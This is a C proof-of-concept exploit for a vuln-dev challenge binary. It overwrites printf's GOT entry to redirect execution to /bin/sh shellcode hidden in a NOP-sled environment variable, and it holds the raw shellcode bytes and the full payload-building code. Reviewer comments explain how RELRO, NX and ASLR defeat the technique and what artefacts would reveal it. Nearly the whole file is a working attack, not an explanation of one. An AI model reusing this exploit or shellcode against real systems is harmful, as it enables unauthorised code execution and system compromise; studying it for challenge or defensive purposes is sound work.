/* example exploit for vuln-dev challenge 2, requires the address of the shellcode in the environment as an argument */
/*
 * example exploit code for vuln-dev challenge 2
 *
 * we overwrite printf's got table entry to point to our
 * shellcode in the environment
 *
 * omicron tau - otat_private
 */
/*
 * objdump, grep, and awk need to be in your path
 *
 * tested on linux 2.4.20 using env address 0xbfffe2ac
 *
 * rm db.log first
 */
/*
 * Reviewer note (defensive context): this historical proof of concept
 * relies on three properties of the 2003-era target that modern toolchain
 * and kernel defaults remove: a writable GOT (defeated by full RELRO,
 * -z relro -z now), an executable stack/environment region (defeated by
 * NX), and a predictable environment address that the operator supplies
 * by hand (defeated by ASLR/PIE). Each of those alone breaks the chain.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define VULNPATH "./vdc2" /* path to vulnerable binary */

/* /bin/sh */
/* Raw payload bytes placed into the environment by main(); the length is
 * measured with strlen() below, so the string must contain no 0x00 byte. */
char shellcode[]=
"\xeb\x21\x5e\x31\xc0\x88\x46\x07\x88\x46\x0a\x89\x76\x0b\x8d"
"\x5e\x08\x89\x5e\x0f\x89\x46\x13\xb0\x0b\x89\xf3\x8d\x4e\x0b"
"\x8d\x56\x13\xcd\x80\xe8\xda\xff\xff\xff\x2f\x62\x69\x6e\x2f"
"\x73\x68\x38\x2d\x69\x32\x33\x34\x35\x36\x37\x38\x39\x61\x62"
"\x63\x64\x65";

unsigned int go; /* GOT entry address for printf */

/*
 * Resolve the address of printf's GOT slot in the target binary by running
 * objdump -R on VULNPATH through a shell pipeline and parsing the first
 * matching relocation line. The result is stored in the global `go`.
 *
 * NOTE(review): popen() and fgets() results are not checked; if the
 * pipeline fails, buf is parsed uninitialized and `go` is garbage.
 */
void find_got_addr()
{
    FILE *p;
    char buf[1024];

    /* Shell command is built from the compile-time constant VULNPATH only;
     * no user-controlled data reaches the shell here. */
    snprintf(buf, sizeof(buf), "objdump -R %s | grep ' printf' | " \
        "awk '{ print \"0x\"$1 }'", VULNPATH);
    p = popen(buf, "r");
    fgets(buf, sizeof(buf), p);
    pclose(p);
    go = strtoul(buf, NULL, 0);
    /* The original author's 2-byte adjustment is undocumented ("/* ;; */"
     * in the source); it presumably compensates for how the target indexes
     * its write -- not derivable from this file alone. */
    go -= 2; /* ;; */
    printf("[!] using got addr 0x%x\n", go);
}

/*
 * Entry point. argv[1] is the address of the shellcode inside the target's
 * environment, which the operator must determine separately (the file
 * header records the value used during testing).
 *
 * Builds three pieces of attacker-controlled input and exec()s the target:
 *   obuf   -- 128 bytes holding the GOT slot address repeated every 4 bytes,
 *             NUL-terminated, passed as the target's argv[1];
 *   envbuf -- 8191 bytes of 0x90 with the shellcode copied in at offset 8000,
 *             exported as environment variable SC;
 *   scbuf  -- the 4 raw bytes of argv[1] (the env address), passed as the
 *             target's argv[2].
 *
 * From a detection standpoint, the observable artefacts are an unusually
 * large environment variable consisting mostly of 0x90 and argv strings
 * made of repeated non-printable pointer bytes.
 */
int main(int argc, char *argv[])
{
    char envbuf[8192];
    char obuf[129];
    char scbuf[5];
    unsigned int scaddr;
    int i;

    if (argc < 2) {
        fputs("vdc2x: usage: vdc2x scaddr\n", stderr);
        exit(1);
    }
    scaddr = strtoul(argv[1], NULL, 0);
    find_got_addr();

    /* Fill obuf with copies of the GOT address at every 4-byte offset. */
    memset(obuf, 0, sizeof(obuf));
    for (i = 0; i < sizeof(obuf) - 1; i+=4)
        memcpy(&obuf[i], &go, 4);
    obuf[sizeof(obuf) - 1] = 0;

    /* 0x90-filled environment buffer with the payload near its end. */
    memset(envbuf, 0x90, sizeof(envbuf));
    memcpy(&envbuf[8000], shellcode, strlen(shellcode));
    envbuf[sizeof(envbuf) - 1] = 0;
    setenv("SC", envbuf, 1);

    /* Raw little-endian bytes of the caller-supplied address. */
    memcpy(scbuf, &scaddr, 4);
    scbuf[4] = 0;

    /* Replace this process with the target; never returns on success. */
    execl(VULNPATH, "./vdc2", obuf, scbuf, NULL);
    return(0);
}